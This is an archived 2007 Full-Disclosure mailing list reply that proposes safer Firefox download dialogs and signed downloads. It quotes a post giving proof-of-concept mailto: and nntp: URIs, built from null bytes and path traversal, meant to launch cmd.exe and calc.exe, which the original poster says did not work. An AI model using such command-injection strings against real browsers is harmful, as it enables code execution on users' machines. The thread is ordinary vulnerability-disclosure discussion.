lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 25 Jul 2007 12:18:22 -0400
From: wac <waldoalvarez00@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: FIREFOX 2.0.0.5 new vulnerability

Well I hope the next version won't open 45 internet explorers when I click
the mailto URLs. And that when you download something you don't have the
save button enabled by default (and with that delay to avoid return hits
security things) It should have enabled by default the cancel button.
Instead of everybody having to wait a century to get the save button
activated. Is so broken that way. Ahh and to prevent clicks the dialog
displayed somewhere away from the mouse pointer. Ahh and by default no
having enabled the open with when you download but the save as (somebody can
hit enter without noticing). Hey maybe configurable?

And what about providing in the website some hash over SSL so you can verify
that is was not modified on the fly when you download? I mean encrypting
every download around is simply brain dead but a hash is OK. Hey what about
a digital signature you could verify with a public key? Zero overload on
servers ;)

Regards
Waldo Alvarez.

On 7/25/07, Mesut EREN <meren@...akkiremit.com.tr> wrote:
>
>  Hi all,
>
> FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5.
> But don't work is code.
>
> Example code is
>
> mailto:%00%00../../../../../../windows/system32/cmd<%00%00../../../../../../windows/system32/cmd>".exe
> ../../../../../../../../windows/system32/calc.exe " - " blah.bat
>
> nntp:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - " blah.bat
>
> Where i missing?
>
> Mesut EREN
> BAŞAK ÇATI & CEPHE SİSTEMLERİ
> Bilgi İşlem Sorumlusu
>
> MCSA:S,MCSE:S,CEH,CCNA
>
> meren@...akkiremit.com.tr
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ